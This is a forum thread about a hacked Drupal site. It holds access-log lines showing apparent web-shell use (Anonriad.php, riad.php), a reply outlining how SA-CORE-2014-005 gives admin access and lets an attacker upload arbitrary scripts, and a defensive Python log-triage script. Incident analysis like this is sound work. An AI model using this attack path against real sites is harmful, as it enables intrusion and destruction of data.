[10:21:15] "GET /sites/default/files/slides/slide1_0.jpg HTTP/1.0" 200 69377 "http://site.ru/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:21:15] "GET /sites/default/files/777rcing.jpg HTTP/1.0" 200 3898 "http://site.ru/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:21:18] "POST /Anonriad.php HTTP/1.0" 200 3132 "http://site.ru/Anonriad.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:21:27] "POST /Anonriad.php HTTP/1.0" 200 4449 "http://site.ru/Anonriad.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:21:28] "GET / HTTP/1.0" 200 1632 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"

Attachment: supit-hacked.png (image, 1.36 MB)

Comments

mbaev, 22 December 2014 at 15:45

"SergeyB" wrote:
how the site was broken into

Through this vulnerability, https://www.drupal.org/SA-CORE-2014-005, it is possible to gain access to the admin panel. An admin can (through the file browser) upload any script to the server and run it, and that script can do anything, including deleting all of the site's files and creating the index in the root that you are seeing now. In fact there are many options. It depends on one's imagination.
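The sequence described in this thread (admin login, content creation, then a new PHP file in the root) can be pulled out of the posted access log with a small triage script. This is an added example, not part of the original thread; the function names, the static-asset filter and the rule set are assumptions made for illustration, and `site.ru` is the host as it appears in the posted log.

```python
import re
from urllib.parse import urlsplit

# Line layout used in the post: [HH:MM:SS] "METHOD path HTTP/x" status size "referer" "agent"
LINE_RE = re.compile(
    r'\[(?P<time>\d\d:\d\d:\d\d)\] "(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
STATIC_EXT = (".css", ".js", ".png", ".jpg", ".gif", ".ico")
# PHP entry points that Drupal 7 core ships in the document root.
CORE_ROOT_PHP = {"index.php", "cron.php", "update.php", "install.php",
                 "authorize.php", "xmlrpc.php"}

def parse(line):
    """Return the fields of one log line as a dict, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None

def classify(entry, site_host):
    """Return the list of reasons this request deserves a look (empty if none)."""
    path = urlsplit(entry["path"]).path
    method, status = entry["method"], entry["status"]
    ref_host = urlsplit(entry["referer"]).hostname
    reasons = []
    if path == "/user/login":
        if method == "GET" and ref_host and ref_host != site_host:
            reasons.append("login form opened from external referer " + ref_host)
        if method == "POST" and status == "302":
            reasons.append("login POST redirected (Drupal 7 redirects on success)")
    if re.fullmatch(r"/user/1(/.*)?", path):
        reasons.append("uid 1 (site administrator) account page")
    if path.startswith(("/admin", "/node/add")):
        reasons.append("administrative or content-creation page")
    if method == "POST" and re.fullmatch(r"/node/\d+", path):
        reasons.append("POST to a node page")
    m = re.fullmatch(r"/([^/]+\.php)", path)
    if m and m.group(1) not in CORE_ROOT_PHP:
        reasons.append("non-core PHP file in document root: " + m.group(1))
    return reasons

def timeline(lines, site_host):
    """Drop static-asset noise and return (time, method, path, reasons) for flagged hits."""
    out = []
    for line in lines:
        entry = parse(line)
        if entry is None or urlsplit(entry["path"]).path.lower().endswith(STATIC_EXT):
            continue
        reasons = classify(entry, site_host)
        if reasons:
            out.append((entry["time"], entry["method"], entry["path"], reasons))
    return out

# Lines adapted from the log in the post (user agent shortened to keep them readable).
SAMPLE = '''\
[10:16:13] "GET /user/login HTTP/1.0" 200 6637 "http://www.notascent.co.il/sites/all/themes/riada/css/exploit.php?url=si..." "Mozilla/5.0"
[10:16:14] "GET /sites/default/files/css/css_791YXBaKKm1ORM_7huSKEsIV9tSWq6wmRkERhuXpN6w.css HTTP/1.0" 200 1902 "http://site.ru/user/login" "Mozilla/5.0"
[10:16:20] "POST /user/login HTTP/1.0" 302 20 "http://site.ru/user/login" "Mozilla/5.0"
[10:16:21] "GET /user/1 HTTP/1.0" 200 8964 "http://site.ru/user/login" "Mozilla/5.0"
[10:17:25] "GET /node/add/page?render=overlay HTTP/1.0" 200 8176 "http://site.ru/user/1" "Mozilla/5.0"
[10:18:58] "POST /node/31 HTTP/1.0" 200 9284 "http://site.ru/node/31" "Mozilla/5.0"
[10:19:14] "GET /Anonriad.php HTTP/1.0" 200 4457 "-" "Mozilla/5.0"
[10:19:16] "POST /Anonriad.php HTTP/1.0" 200 2581 "http://site.ru/Anonriad.php" "Mozilla/5.0"
[10:21:07] "GET /riad.php HTTP/1.0" 200 832 "-" "Mozilla/5.0"
[10:21:28] "GET / HTTP/1.0" 200 1632 "-" "Mozilla/5.0"
'''.splitlines()

if __name__ == "__main__":
    for t, method, path, reasons in timeline(SAMPLE, "site.ru"):
        print(t, method, path, "->", "; ".join(reasons))
```

Run against the full log, the same rules reduce the session to the requests that matter for cleanup: the account used, the node that was created, and every root-level PHP file that was requested (here both Anonriad.php and riad.php).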